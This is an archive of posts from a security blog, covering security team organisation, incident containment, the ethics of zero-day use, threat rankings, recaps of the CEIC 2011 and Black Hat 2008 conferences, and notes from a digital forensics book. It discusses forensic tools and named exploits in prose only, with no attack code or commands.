CyberGuardians

Get with times, decentralized security is so 2000 and late

2011-06-20T20:51:00.002-04:00

You would think we would have matured enough as a security industry that there would be a consensus on this topic. However we are not even close, mainly due to bureaucracy and politics. So lets survey the land of failed justifications.

"Were so big we have to be decentralized"

There is nothing that states centralized security means physical separation. You can have people local to your sites all over the world and still report into a single organization.

"Our business unit is so different we need our own team"

This argument often can be valid for IT services which require customization and agility. This is rarely the case for security. Just because a particular business may require a different policy or higher standards doesn't mean they should be rogue. The overall marching orders need to be coordinated otherwise you end up having gaps in visibility, protection, compliance, etc.

"This is the way we have always done it here"

This is by far the weakest thing I've ever heard. I almost think its purely a justification to hand out C-level titles. News flash, if your organization has more then 1 CISO your probably not that good at IT or Security. You have to ask yourself are they even qualified for that position or do you have a bunch of climbers looking for a security bullet point in their resume.

Now I'm not completely blind to the fact the separation is often done for real reasons, unlike the horrible ones given above. Legal restrictions sometimes may prevent data from leaving a particular country or mandating particular requirements. However I'm not aware of any law anywhere stating that your IT security goals and objectives can't come from a centralized structure. If there is one, please provide me with the source. Another valid reason that often arises is due to mergers and acquisitions. Its quite common due to being a new acquisition, that an organization may not be fully integrated yet. Or even the case that strategically you want to keep it separate so you can divest it much quicker.

For me though, its important to understand that your entire organization is fighting the adversary together. You fail and succeed as an entire company, not as a business unit. While an enclave or silo may have world class security practices, they are only as strong as the weakest link. At some point there is a trusted process or network connection for another unit that may not have such good security. This doesn't mean that all security personnel need to be located at the corporate mothership. It simply means you need a common understanding of how to handle security incidents, architect your network and implement better security controls. If you look around and you see a lot of dotted lines and CISOs on your org chart, that's a pretty good sign that your security efforts are disjointed, taking on too much, and doing nothing really well.

Shooting Blanks FTL

2011-06-01T21:28:00.002-04:00

How many times in your career have your heard there are no silver bullets? I'm sure its been quite a few times and then some. It definitely needs to be apart of your infosec mantra to ensure people don't have a false sense of security. It should be well ingrained that [AV, FIREWALLS, IPS, PROXIES, *] don't stop sophisticated attackers. They are at best a speed bump in the road.

So what is the point of this post? I've noticed a disturbing trend in the industry of knowledgedable individuals going to the opposite of the spectrum. Instead of taking a practical approach they shoot down any security control based on its flaws. One of my favorite quotes illustrates this perfectly.

Narrator: Tyler, you are by far the most interesting single-serving friend I've ever met... see I have this thing: everything on a plane is single-serving...
Tyler Durden: Oh I get it, it's very clever.
Narrator: Thank you.
Tyler Durden: How's that working out for you?
Narrator: What?
Tyler Durden: Being clever.
Narrator: Great.
Tyler Durden: Keep it up then... Right up.

Some people are just a little too clever for their own good. They routinely dismiss proposed security solutions as having flaws and not worth pursuing. News flash, short of unpluging the power or pulling the network cable, all solutions have vulnerabilities to a certain degree. Doing nothing isn't an option. Accepting the status quo is a defeatist attitude in this little thing we call "cyber conflict". Yes thats right I used the word cyber, deal with it. APT in your house stealing your stuff. Ask yourself this, do you go to a gun fight with a knife? No, you want a gun preferably with some ammunition. In this case, the ammunition is your defense in depth. Yes it most notably depends on people and process, but security tools play a big factor. While in this allegorical gunfight the adversary has an AK-47 with a banana clip, you should at least show up with a Glock-22 loaded with a few rounds of .40 S&W. Yes more times then not we will lose, but making the adversary duck, dodge, displace, and slow down is worth the effort. Who knows you might even win some of those battles and eject them from your network like spent cartridge.

CEIC 2011 Recap

2011-05-19T21:36:00.003-04:00

After leaving a cold and rainy 50 degrees and arriving in Orlando to a warm, sunny 80 degrees, I was immediately in a better mood. The Royal Pacific venue is awesome. It's located at Universal Studios, has nice rooms and great restaurants. Registration was quick and painless with no long DefCon style lines. I was surprised a bit though that 1100 people were here as I thought the con would be a little smaller. However it doesn't feel as crowded as some others I've been to. They did mention that the amount of attendees has doubled since 2009.

I first attended an Encase Forensic v7 Preview workshop to outline what is being released in June. They have FINALLY added true multi-core, multi-threading to take advantage of good hardware. Some highlights include all modules like the ProTools Suite are now included in the base product and more noteworthy native processing for iOS, RIM, Android, and WinPhone6. There is also a new evidence format (EX01) and shiny new frontend for opening cases and adding evidence. The new image format also supports AES256 encryption, so the use of encrypted hard drives may be a thing of the past. The case processor has now been integrated and allows for templates to be created scripting much of what you want to preprocess like mounting compound files. They are also breaking out a new product called Evidence Processor which will allow you to distribute the load to multiple machines and merge them back into a single case. Overall it looks to be a winner and should help them compete better against FTK.

Next I attended "Memory Analysis and Malware Triage" by David Nardoni and two guys from General Dynamics. This was a pretty basic presentation probably more worthwhile 3 years ago or to someone who had never done memory analysis. It included a lab using Memoryze analyzing an rbot sample. They covered the key indicators to look for in a memory capture and what they can reveal. They also mentioned a tool called FingerPrint from HBGary.

To wrap up Day 1, I attended “What’s new in Windows Forensics” by John Marsh. This was mostly a review of what has been out for awhile now. Since I don't examine Win7 and 2008 systems on a regular basis, most of it isn't applicable for me until it becomes more mainstream in the corporate environment. There was the usual stuff on mining UsrJrnl and TxF transaction journals. He also mentioned that last access times are disabled by default now. The most interesting segment was on the registry. You now have to check for two different registries based on privilege level to capture all the details (UsrClass.dat). There are also transaction logs for the registry which will be huge for malware investigations. Some of the attendees from the UK also talked about a Woanware which has some nice tools. Finally we covered mounting and sharing out the volume shadow copy using vss admin. VSS makes a restore point every 7 days, prior to patching, and whenever it installs an unsigned application.

This was followed by a nice welcome reception by Guidance at the lagoon with food and drinks.

Day number 2 started off with a great keynote by Eric O’Neil. As a fan of the movie Breach, I was thrilled to see this talk. He talked a lot about his experiences busting Robert Hansen, which was awesome to hear first hand anecdotal stories. He mentioned about how scared he really was when he stole Hansen's palm pilot and had to sprint back to the room because forensics took too long imaging it along with the memory card and he couldn't figure out which bag pocket he took it out of originally. He also said the best thing he ever learned from Hansen was on day one. He said the spy is always in the worst position. This means he is always the one who will suffer the consequences if caught and constantly looking over his shoulder. O’Neil also believed that while Hansen may have started spying originally to make money for his family, he wasn't greedy and told the Russians to stop giving him so much money and keep it under 10K per drop. He ultimately thought Hansen kept spying because the Russians made him feel like he mattered and was a success while he was loathed by his peers at the FBI. Aside from Hansen, he also touched on some other interesting topics. He said while on travel he always puts up the do not disturb sign on his room and then sets traps in the room. Of course, some one always enters his room looking for "stuff". He also covered some common things he is seeing on the many corporate espionage cases he has worked. From dumpster diving and posing as contracted shredding companies to well-placed interns and phony shell companies the environment is ruthless. He reiterated an idea all should be familiar with. If you have something cool, somebody wants to steal it.

Next I attended "Android? Encase Does.." by Andy Spruill. I liked this lab because we got to walk though analyzing evidence files from a Sprint Evo 4g. So Android is leveraging YAFFS with a FAT formatted sdcard typically. Google has pushed hard for developers to always write their application data to the sdcard, however this isn't always the case. The two options for acquiring included rooting the phone and usb to usb debugging. The former allows you to see much more of the file system, however its way more intrusive. The main location for application data is in /Android/data. You should always process the sdcard first as many tools accessing the built-in flash will modify the timestamps on the sdcard. Once processed you can export location data to a KML file and view it in Google Earth for an awesome tracking visual. Its good to become familiar with SQLite and SQLiteBrowser as all the applications use it. Also of interest, the navigation app records the turn by turn direction as wav files that can be retrieved to show where the target may have been driving at a certain time. Spruill suggest that your practice rooting Android phones as it is quickly becoming an essential skill.

From there I listened to Rob Lee's Super Timeline presentation. The session basically walked through building an accurate timeline using SIFT tools (regtime, fls, log2timeline, etc). He noted that FAT will stay in local time regardless of what time zone you are in. He also mentioned that NTFS will keep from 8-12 timestamps (STDInfo, FNInfo, SFNInfo). MFT Examiner a tool from the UK. He also mentioned that while it still has lots of legitimate hits, looking for all zeroes in the nanoseconds field is a decent indicator of timestomping manipulation.

At this point, I couldn't fathom sitting through an Enscripting 101 session, so I got on the waitlist for “Revealing Intent with Windows 7 Artifacts” by Alissa Torres from Northrop Grumman. She was a great presenter and had people engaged the whole time with her HappyCubes. There are two types of Win7 jumplists: AutoDestination for Users and CustomDestination for Apps. You can mount the compressed files to gain further details. The .search-ms connectors have lots of metadata and can be exported as xml to find more user activity. Federated searches(.osdx) is also a new feature in Win7 that allows you to search a bunch of predefined sources including websites and network shares. Libraries are another artifact which is groups of files from different locations kept in a single container. StickyNotes also can contain some user attribution. TZworks and Nirsoft provide good shell bag parsers. Yaru is a nice tool for finding deleted regkeys. If you delete a directory in Win7, there will only be an $I file, not an $R file. DMThumbs is a good parser for the new thumbs.db format in Win7.

After this there was a cool happy hour in the Exhibit hall followed by a great party by Mandiant at the Wantilan Luau. They gave out t-shirts and had an awesome open bar.

I kicked off Day 3 with Simon Key's presentation “File Identification and Recovery Using Block-Based Hash Analysis”. I must confess I was not properly caffeinated so it took me awhile to get into this. I originally learned about this about 3 years ago when attending training by Guidance. Simon has made tremendous improvements in the quality and usability of the enscript. It’s help function has a nice explanation of how to use it. First it’s a good idea to close all your mounted compound files as that may give you errors when running the enscript. If you are doing multiple files always use the hash list. He also mentioned a common mistake is to think it’s found parts of your file when it's only sectors of all x00s or xFFs. The intelligent tail analysis function does take a lot of time, but it helps you when the last block of your file is missing and you don’t want to keep hashing the same block over and over. Simon walked us through 3 different demos which were great. VLC actually played a partial recovery with only 8% of the sectors. He also showed me a new feature of his enscript that he calls Block-Based File Identification aka FuzzyHashing aka ssdeep. If you know the structure of your file, for example Word docs are set up in 64byte blocks, you can find varied versions of the file. Make sure to check process all data with current files, so you don't waste time on deleted data. Overall I enjoyed this one quite a bit, it was a nice refresher to the subject.

Next I skipped out on the Mock Court Trial presentation to get into Rob Lee's session on web browser analysis. I'm glad I did, it was packed as usual. There was a heavy focus on the new stuff in IE8/9 and then at the very end on Firefox. Most of the material is stuff from his SANS 408 course. First off, when you see file:// in the index.dat file, it doesn't necessarily mean it was opened in the browser, but more likely through local file clicking. There is no such thing as last-modified in the index.dat so if you see that they don't match is most likely means your tool isn't functioning correctly. WebHistorian and NetAnalysis have been updated to fix this. DOM storage is a great place to look as most of the app preferences are stored here. Session recovery also has some very good evidence like clear text passwords; however there isn't a lot of automated parsing yet. MiTech makes his recommended Structured Storage Viewer. Suggestsites.dat also can give you a clue as to what the suspect was doing even if they have cleared their browsing history. Internet Evidence Finder(IEF) is another favorite tool for carving evidence out of memory and disk, however the timestamps aren't found for memory. It's worth noting that the pagefile can often move artifacts back into ram after reboots. The infamous Chewbacca defense is often used to debunk evidence by saying they have to prove something isn't possible. Flash Cookies have become huge over the last few years as they don't expire, are browser independent, and aren't cleared automatically. Rob recommended reading the WSJ article series on web privacy. A nice trick for recovering files is to make a file with the same name and in the exact location and then use the recover last version function to restore from VSS. The Firefox sessionstore.js is in clear text and you can use FirefoxSessionStoreExtractor from woanware to parse. He believes the privacy mode in Firefox is superior to IE as it overwrites instead of deleting. Another cool indicator is when an exactly an hour of history is missing showing they used the clear last hour option.

After a steak lunch, most of the attendees were in a food coma for Litchfield's session “Database Breach Investigations Made Practical”. He is really one of the few who are creating DB specific tools in this sector which is awesome. Apparently he doesn't have to work anymore either since he sold his company back in 2007, but he is still giving back to the community. He said that Oracle is harder to triage because there are better native tools for MSSQL and MySQL. He started off by outlining all the different db artifacts that can be used. He mentioned that if you ever see the Java Wrapper Class in the DB ObjCode, which is typically in ram, this is a sure sign of an intrusion because the code isn't used anymore. LogMiner was a tool he recommended. BlockSize for Oracle is 8192, ID 10 is the user table, and ID 18 is the obj table. Also checkout databasesecurity.com. Some of his standalone cmd line tools include filter, dumpaction, and orablock. Another GUI tool is DataBlockExaminer for Oracle, which will show you deleted rows in red.

To wrap up Day 3, I went to "The Art of Mobile device Malware and How to Detect and Defend Against it" by Roy Hu. Who knew but apparently Accenture has some good talent in the mobile security space. They are seeing quite a bit of non-targeted information stealers and banking targeted malware. They also have found that while remote wipe is recommended it often leaves artifacts behind on the phone. They expect to see Near Field Communication (NFC) take off more in the US the way it has in Asia and the EU. They mentioned briefly that the mobile variant of Zeus dubbed Zitmo. The second half of the presentation was a techincal dive on DroidDream, given that name because it was only active a night when the owner of the phone was most likely asleep and charging their phone. DroidDream used XOR encryption and leveraged Exploid for 2.1 or less and RageAgainstTheCage for 2.2 or less to root the phone. This has all been patched in Android 2.3. They mentioned that you should use Lookout AV for your Android phone, however there are also trojaned clones of it so beware. Also, Lookout had a nice presentation at DefCon18 which is recommended. One of their favorite Mobile Device Management (MDM) Tools is by Good Technology because it actually uses its own encryption and separates out corporate data and personal data. I spoke with them afterwards and said there wasn't any good anomaly detection today for malware on cell phones that they are aware of and your basically stuck reviewing logs of installed apps and having to compare that to osint feeds. I asked them specifically about malware targeting specific companies and they didn't have any examples of that.

On Wednesday morning, I attended “iOS Forensics and Encase” by Sean Morrissey. He recommends having a small charger for use inside a faraday bag to extend battery life and avoid the phone locking. He said its best practice to use a MacOSX workstaton and its native tools for analysis. He likes the PList Editor from the development tools, however you need the XCode3 instead of the newer XCode4, which removed some functionality. MacForensicLab is one of his favorite data carvers. He also likes the iPod Robot Plist editor for windows platforms. He said the forensic community has known about the GPS log data that Apple kept since iOS3, but kept quite on it to avoid notice. Since it went public, what use to provide up to a year of GPS data, is now going to be only 7 days and probably encrypted with iOS5. Another favorite is MSAB XRY, which does a complete physical dump. And also ZRT for doing automated screenshots. He thinks about 80% of what you need you can get from logical dumps and that usually is enough. Physical dumps are going to mostly contain fragmented data that you have to manually parse out. His favorite acquisition tools are FTS iXam and AccessData's MPE+. He has verified these tools by using HFS debug and tracking the incremental writing of CatlogID's. Encase has no native HFS+ support yet, however you can use a hexeditor to change the file header from HX. You can also change a raw dd file to a dmg extension and Mac's will mount it. Apple devices always use local time and he likes TimeLord for analysis. C4All.CA has nice tools (C4M and C4P). Binary Plist Finder & Parser are also good tools. The AT&T sim card only contains the last 10 calls and provider data and it is being phased out to use built in hardware in the future. The Encase Neutrino product doesn't parse out as much data from iOS as some of the other products like CellBrite.

To close this con out I attended "Encase and Flasher Box HEX Dumping Analysis" by John Thackray. He is British born but a Kiwi by choice in his own words. When it comes to cell phones there is no one single product that is going to get you everything you want. Extraction is the proper term as a true bit-by-bit copy isn't really possible. A flasher box should be a last resort as it can sometimes destroy evidence and even brick the phone. Test devices are essential. Check out the forum phoneforensics.com. All the firmware data you want is on the chipset and has nothing to do with the sim card. Flasher boxes have their code updated frequently so you need to update weekly. The process is very fast however the data you get back is highly fragmented. Locate all the maintenance codes as they are best way to get the phone to spit out make/model/version information and also perform other options. PM Records (Permanent Memory) are 0-999. Absolute Records are the memory offsets used to create binary dumps. He really showed us how the unlocking process worked on a Nokia which was cool to see. It was basically knowing where the IMEI and Security codes are kept. To find out a new structure when a new phone comes out the process is best down with KDiff3. By using a control phone and comparing hex dumps you can track when a text is sent or a call is made and see where the changes are put. The phone numbers themselves are usually stored as a reverse nibble. Timestamps are often different for sent messages and received messages. Hexaminer is a great tool for creating searchable 7-bit hex terms from known ascii text. Next we worked through a lab on a Samsung phone and manually recovered SMS text messages from raw hex. Someone from the crowd recommended a tool called Alibi(SMS Edit) for modifying sms text messages. Thackray said TigerText is another one that sends text messages and immediately deletes them. He also gave us a tool on CD called LiveExaminer.

So now that my first CEIC is in the books I have to say I was very impressed. The venue in Orlando is awesome and everything was well run, except for a minor lighting snafu. It wasn't overcrowded like Blackhat/Defcon, the food was good, and it was easy to talk to the presenters. I think the only drawback is that a good chunk of the crowd isn't very technical, think e-Discovery legal people and new to forensics cops. I would also say it’s better to register sooner rather than later to make sure to get into your favorite sessions. In the future I would like to see a more dedicated advanced technical lab-based track for people that have been doing digital forensics for awhile. Being able to work through some evidence is much more appealing than just a pure lecture. I will definitely come back to the Orlando location on the odd years as this was a great experience for me.

Best Presenter - Rob Lee - I think he was the most polished of the speakers and talked about things I wanted to hear. You can tell he is someone who like to know why something works and not just get the output of a tool.

Most Fun Presentation - Alissa Torres - She kept the crowd smiling the entire time and her enthusiasm was infectious.

Best Presentation - John Thackray - This shed light on area of phone forensics that most people don't have a lot of experience. It delivered exactly what I was looking to hear and probably taught me the most of all the presentations.

Best Vendor - NetWitness by a nose - Mandiant had a great party, but I liked the NetWitness booth the most as they took the time to really show me the product and give me the details I was looking for in regards to capabilities and deployment scenarios. Their tools show great promise for being able to process things in bulk off the wire.

Containment Strategery

2011-05-10T17:24:00.004-04:00

One of the key metrics Computer Incident Response Teams (CIRTs) often measure is time to containment. This is often seen as a way to guage the performance of the team as it tracks how long it takes to contain a compromised or infected computer from the time of reporting or detection. This number varies widely accross the companies and many simply do not have the capability or desire to record this information. I think this metric often indicates how well the CIRT team knows their environment and the maturity of their processes. So I highly recommend it be a key performance indicator in your CIRT program.

Today however I would like to specifically talk about an appropriate goal for this metric in relation to compromise by advanced external threats. So I will be excluding non-targeted malware and insider scenarios. I believe on one end of the spectrum you have teams that like to contain as soon as possible to limit any possible impact, whereas on the opposite end you have teams that like to wait a long time (weeks/months, usually contracted responders) to fully scope an incident prior to making any major containment efforts. And before we proceed further containment can mean many things, however I will define it here as isolation or removal of the compromised computer from the network. That being said, why would you choose either of those extreme options? One strategy is to quickly deny the adversary any asset before they can conduct further operations inside your network. The big pitfall being here, that you don't have enough time to figure out exactly how they compromised the system and what other systems they control in such a short time span. Whereas, waiting longer allows you to fully scope out the extent of the breach where the hope is that the investigation doesn't alert the intruders that the defenders are on to them. This routinely fails as advanced intruders, know to mix up their backdoor tools and maintain several entry and exit points. To me rather then being time focused, I prefer a process flow that scopes the incident for you.

Questions like the following are key to this flow:
What method was used to compromise the system?
How long have they been active in the environment and are they still active?
Which system was ground zero for the intrusion?
What accounts have been compromised and can they be reset in a timely manner?
What ingress and egress points are the intruders using?
What systems have been touched by the intruders?
What command and control (C2) method are the intruders using and can you decipher it?
Have you seen this group in your environment before?
Have you documented the indicators of compromise (IOCs)?
Do you have the ability to scan your environment for these IOCs?
Do you have the capability to take the system offline without a disasterous business outage?
Has the scope of the breach and/or data loss been determined?
Has senior security leadership been briefed on the incident?
Is data exfiltration actively occurring?

These are just some intial questions you need to add into your containment decision process flow. I can tell you that being on either end of the spectrum is not sucessful in large companies where you don't have good system inventory and a full internet gateway registry. It's possible to do either if you have full mastery of your computing infrastructure, but this is a rarity. I think based on your capabilities and the questions above you can create a plan that gets the system contained as quick as possible with out tipping off the intruder and/or allowing them to continue to develop their foothold on your network.

Stay secure my friends.

When to burn a Zero-Day?

2011-04-29T21:20:00.003-04:00

So I've often heard people say "Why would you waste a Zero-day on <insert something>?". And on the opposite end of using your Zero-day, you have the hoarders who simply collect them to keep in their back pocket. So the question remains, when is the appropriate time to actually use a Zero-day for legitimate purposes?

The primary impetus for this discussion was someone smugly claiming they would never use a zero-day in a hacking competition or CTF event. So I can understand that stance, however if your trying to win something like P0wn20wn or some other serious hacking competition why wouldn't you? Is that truly a waste of a good Zero-day if it brings you respect in the industry and potentially more consulting work? I don't believe so, however financially given the cost of exploit development it may be wasteful. I think it really depends on the exploit. I've heard that security research companies often task teams of individuals for months to years just to develop a great reliable remote exploit on a popular platform or application. That isn't cheap in terms of billable hours by any means. Financially it may make sense to sell your exploit, however as a whitehat and someone who is a fan of responsible disclosure I can't agree with this line of thought. The other option may be to leverage that exploit in your pen testing engagements. So how would that benefit the customer? Yes it may give you credibility, but if they can't do anything about it patching wise, then nothing is gained. I don't buy into that approach unless you as a pen tester can recommend a solid mitigation plan for the vulnerability you've exploited.

To wrap things up, unless you are specifically tasked to research and deliver a working exploit to a customer for their use, I think it makes the most sense to just follow the responsible disclosure methods. To the contrary, if you are trying to build up your credibility and/or consulting business then it may also make sense to use them in an engagement or competition. I still do not believe the customer is looking to be exploited by a zero-day without any mitigation possibilities, unless you can show them that the exploit is already being traded in the underground. In that case, it is not really your private exploit but a legitimate attack they need to prepare for.

What scares you more: APT vs Anonymous vs Wikileaks?

2011-04-22T13:19:00.008-04:00

So the past few years have been very interesting in IT security as the amount of public disclosures have increased exponentially. Victims like Google, RSA, HBGary, Bank of America, etc and consultants like Mandiant, McAfee, and Verizon Business have provided more details then ever about the serious threats facing the public and private sector. Its almost coming to the point of information overload, and that's even after weeding out the FUD and sales talk.

So as a security leader in your company what keeps you up at night? First lets define the three "threats" I'm detailing. Yes there are still plenty of other big time threats like organized crime, however I'm keeping the list intentionally small and current.

First you have our beloved APT. I hate this term, its been polluted by the originators of the term, by the people who should know better calling it FUD, and by the sales/marketing folks. But its what we have to work with. APT, has various goals, but the noisiest among them is theft of intellectual property. The outcome of such attacks is also varied, however in the near term it can impact business negotiations and M&A activity and in the long term it turns whatever special sauce your company has into a commodity available to other companies that can likely do it cheaper than US/EU counterparts. Of the three, this is by far the hardest to detect and respond to. It takes a strong security leader with both a short term tactical plan and a long term strategic vision to effectively mitigate this threat.

Next you have the Anonymous threat. For this discussion, just assume Anonymous = Hacktivists. The first rule of dealing with Hactivists is do not underestimate them. HBGary did and they are paying dearly. Hactivists groups are so different its hard to categorize them, however they generally target your company for its perceived policies, ethics, actions, or political stances. Like other threats this requires a comprehensive approach to hardening your network with a particular focus on email and document security. The outcome of such attacks is immediately felt, as its routinely publicized. Having a proactive communications and legal team is crucial to dealing with this threat also. While it's not always the case, acting in a transparent and ethical manner could also alleviate these fears. But that might just be too much to ask many businesses! :-)

Finally, we have johnny come lately Wikileaks and the lot. There are several Wikileaks type sites and for this discussion we can consider them the disgruntled insider threat (FYI, and before you call me out on it, I'm aware that Wikileaks stole some documents via p2p). The outcome of this attack is very similar to Hactivists in that you have an immediate public relations nightmare. Countering insider threats is extremely difficult. In basic terms you cannot not stop a skilled, privileged insider. The upside is that they are the most likely to be caught afterwards and be convicted. Companies have to use that to your advantage. Aside from the typical controls like access logging, DLP, and DRM, there is a whole set of another controls companies don't use. You should routinely communicate to employees that they are being monitored and even demonstrate this capability at internal security/it shows. Do not show them every card you have up your sleeve, however show them that the deck is stacked against them if they try to steal company data. We know this not to be the case, in terms of prevention, but the psychological effect is real.

So while I'm not going in depth on countermeasures, I've generally outlined the threats. Yes, I'm not adhering to the precise definition of threats in all cases, but you know what I mean if you are in IT security. So how do you rate them?

C-Level Executives/Upper Security Management
1 - Wikileaks
2 - Anonymous
3 - APT

CIRT/IT Security
1 - APT
2 - Wikileaks
3 - Anonymous

These are my rankings of what I think and what I believe upper management thinks. As I thought about this, it almost correlates to what causes the most discomfort for the person involved. If you are an incident responder, you don't want advanced foreign CNE actors gliding through your network undetected. If you are an executive, you don't want to do anything the will jeopardize the stock price in the near term. Every company is different, so its not a one size fits all solution. It never is. However, in my opinion taking a long term approach to the defense of your computing assets is the way to go. There are NO silver bullets. Knee jerk reactions need to be avoided to ensure they don't hurt rather then help your company. Consistent security leadership along with a c-level security advocate is beyond important.

Stay secure my friends

Outsourcing strikes again!

2009-10-14T21:59:00.002-04:00

Seriously people when are the decision makers going to get a clue and realize that outsourcing never saves money in the long term and typically leads to something like this.

Source: MSFT/Danger's Servers Were Sabotaged

After reading this story how can you consider outsourcing your critical infrastructure? Just ask T-Mobile how this feels, if they even recover from the negative PR. Outsourcing never delivers what is promised, it's strictly for executives to enrich themselves in the short term and leaves someone else holding the bag when it hits the fan. The only time outsourcing makes sense is when its for short term project-based activities, otherwise your waiting on a potential time bomb.

Also, why is everybody hating on Microsoft? Hitachi was the "expert" vendor in this fiasco performing the upgrade. They should have made damn sure they had a working backup copy prior to this major upgrade. What is it amateur hour? Is that what platinum support buys you these days?

Another interesting aspect to this case now, is the hint of insider sabotage. How are you going to stop a disgruntled privileged user. The answer is, 99 times out of 100 you won't. It is more luck if anything if you are able to prevent it from happening. In cases where you have decent logging you should at least be able to prove what happened after the fact, but good luck stopping it. The only thing that would work prevention wise is dual-controls, which would be very cumbersome. I would be interested to know if any company is going the extra mile of routinely interviewing their system admins to ensure they are not disgruntled. I doubt it. Anybody have some realistic solutions to prevent insider sabotage by trusted administrators?

Black Hat USA 2008

2008-08-12T21:54:00.002-04:00

So my first Blackhat is in the books. I thoroughly enjoyed it and got to learn quite a bit and get some networking done as well. My only two complaints would be first, that it was completely overcrowded on the 4th floor and that made getting to a session very difficult. The second being that classic conference paradox. A lot of the great topics with new material were presented by people with poor public presentation skills, whereas alot of the great speakers presented either old stuff or no real useful content. That aside it was a hoot.

I started the week attending a Malware Analysis class by Mandiant which was excellent. They basically crammed a 4 day course into 2 days, so it moved very quick and had lots of content and labs. The teachers were extremely knowlegeable and were able to convey the material well. My only suggestion would be that they should have spent more time on Ollydbg, but with the labs I can do that on my own time. They did spend extensive time using IDAPro, which helped me understand assembly code structures much better. I would highly recommend this course.

The first keynote speech by Ian Angell was very funny, but essentially preached an anti technology message which I think is mostly pointless considered the techno-geek audience. He did have some really fascinating quotes though. My first presentation was Bad Sushi: Beating Phishers at Their Own Game. While presenting nothing new, they did provide much comedy and insight into how spammers routinely try to rip each other off. They also showed an insane toolkit that traffics in the spam underground that basically contains knock off sites for every large bank in the world. Of course the next session was the highly anticipated DNS Goodness by Dan Kaminsky. This has already been covered to death, so I will only add that it was worth the wait and Dan is the man. Next I attended The Four Horsemen of the Virtualization Security Apocalypse by Chris Hoff. This was probably the most useful and timely presentation I attended. Chris is a good speaker and I enjoyed how he detailed the current shortcomings of virtualization, while also pointing out VM myths as well. In a nutshell, the HA functionality is not there to do anything more then server/desktop virtualization. Beyond that, you are rolling the dice with your availability and network capacity.

After that I hit up Bruce Potter's presentation on Malware Detection Through Network Flow Analysis. This guy is a bad ass and a very good speaker, but he provided nothing relevant in his talk, unless you didn't know Net Flow existed. My last session of the day was Reverse DNS Tunneling Shellcode by Ty Miller. Ty debuted his dns tunneling tool and also a very cool project to create a consolidated framework for shellcode. Once it gets up and running it, check it out at http://projectshellcode.com/ . I liked his talk alot, especially how he demonstrated various attacks through a corporate DMZ. The day ended with beer and pizza, yay!!

Leading off the second day was a keynote by Rod Beckstrom of the newly created NCSC. His talk was very interesting and had a historical twist to it. I agree with him 10 million percent that the best chance to make a security significant impact is to upgrade our protocols which are mostly outdated. My first session of the day was No More 0-days by Ohad Ben-Cohen. He showed off a cool new tool called Korset, which will basically create a control flow graph for any Linux compiled binary which prevents anything out of the ordinary from occuring. I like this technology and would like to see it integrated into a windows based AV suite. My only issue with the tool is that it only works based off system calls and doesn't check parameters. So it would be easy to circumvent by creating your own CFG and passing malicious parameters. Very good work though. My second talk of the day was Visual Forensic Analysis and Reverse Engineering of Binary Data by Greg Conti and Erik Dean. They debut 2 new cool tools aimed at shortening the time it takes to inspect a huge file at the hex level. Basically it helps you quickly find areas of interest in a file, as well as lending it self to repeating patterns that can be used in the future once identified. Next I attended Secure the Planet! New Strategic Initiatives from Microsoft to hear the latest from Redmond. I only heard the first half, but they are expanding their vulnerability research efforts to include 3rd party products and adding an exploitability index to their black tuesday reports. I LOL'd when they referred to black tuesday as something stupid like feature upgrade day. I had to cut this meeting short to head over to Deobfuscator: an Automated Approach to the Identification and Removal of Code Obfuscation by Eric Laspe and Jason Raber. Its a very much needed IDAPro plugin that can save us tons of time. I wrapped up the conference by listening to Bruce Dang's talk on Methods for Understanding Targeted Attacks with Office Documents. Bruce is smart as hell, but talked way too fast. He walked through a few of the office documents headers and structure and demo'd an attack. Also, he did mention that many of the current attacks could be avoided by either installing MOICE, Office 2K3 SP3, or Office 2K7.

On Friday, I was able to make it to most of Defcon. Those badges are freaking sweet. The talks there were mostly the same, but had a much more relaxed, less corporate feel. For only 125 bucks, Defcon is a steal when compared to 1500 for Blackhat. Thats all for now and back to your regularly scheduled programming.

Book Review: Real Digital Forensics

2008-08-01T21:51:00.001-04:00

In continuing my tradition of reviewing books that are 2 or 3 years old, I have recently finished reading Real Digital Forensics by Keith Jones, Richard Bejtlich, and Curtis Rose. Yeah, I hate paying full price for a new book, but mostly its because I buy so many books that by the time I get around to actually reading them, its been a few years Laughing. Now on to the review.

With this group of experienced authors, it hard to imagine the book not being a success. While not spectacular, this books is very solid and fairly easy to read. I would have to say for someone looking to attend the SANS hacking and forensic courses, this book could easily fill the gap and save you thousands of dollars. One thing I really liked was that they did not waste time on any fluff chapters about the history of whatever, they just jumped right into the material. They also made it a point to show the differences between incident response on *nix vs. windows. All the chapters that focused on analysis and response were dead on. They included great case data on the book DVD, which helps you work through the sample cases as well. That is a huge feature that needs to become standard in security books, where feasible. Probably the standout feature of the book for me though, was their chapters on analyzing unknown binaries. By following along step by step through the cases, its helps turn something that is considered more of an art, into a science. They also include good coverage of doing a forensic analysis of a palm device, and included the requisite chapters on email investigation, registry analysis, and browser forensics. One thing that I took note of during the book, was the chapter on building a response toolkit. They pointed out that you need to use filemon to ensure none of your trusted tools access the victims system for resources and instead are using libraries from your toolset. The authors also did a good job of showing both open source and commerical tools throughout the book.

Some of things I didn't enjoy about the book, was the coverage on duplication. But I guess you can't really do much with a topic that boring. Also, the chapter on domain onwership seemed more like a chapter on their DNS project, so it wasn't very useful. Other then that, I would have like to have seen some coverage on cell phone forensics, which is becoming more mainstream.

Overall though this was a great book that I would recommend to anyone in the security field and also system administrators. The authors knowledge of this subject is top notch and its good to be able glean information from them. Not to mention, you can gain a lot of practical experience by working through the example cases on the DVD. You can read my notes on the book here.

Real Digital Forensics

2008-04-24T22:07:00.000-04:00

Real Digital Forensics

by Keith Jones, Richard Bejtlich, and Curtis Rose

1 - Windows Live Response

Never save data locally on the hd, as there is a chance you may be overwriting evidence

Always use the -b option with md5sum, to perform the hash in binary mode

-k option with cryptcat, allows you to set the encryption password

Volatile Data

* system date and time
* current network connections
* open tcp and udp ports
* which exe's are opening tcp and udp ports
* cached netbios name table
* users currently logged on
* internal routing table
* running processes
* running services
* scheduled jobs
* open files
* process memory dumps

To truly verify a system binary, you must compare hashes with trusted source

Common attack involves changing a servers routing table to redirect traffic and bypass firewalls

Firedaemon turns any process into a service

userdump.exe will capture memory space used by any running process. userdump output cannot be sent via netcat, so you must net use a remote share

dumpcheck.exe allows you to examine userdump output. More debugging tools and symbols here

Garner's DD allows full memory dump by mapping virtual address space to /Device/PhysicalMemory object

Nonvolatile Data

* System version and patch level
* File system time and date stamps
* Registry data
* Auditing policy
* History of logins
* System event logs
* User accounts
* IIS logs
* Suspicious files

Regdmp(Reg /export) will copy registry. Provides programs executed on bootup and entries created by the intruder's tools

NTLast provides a history of logins

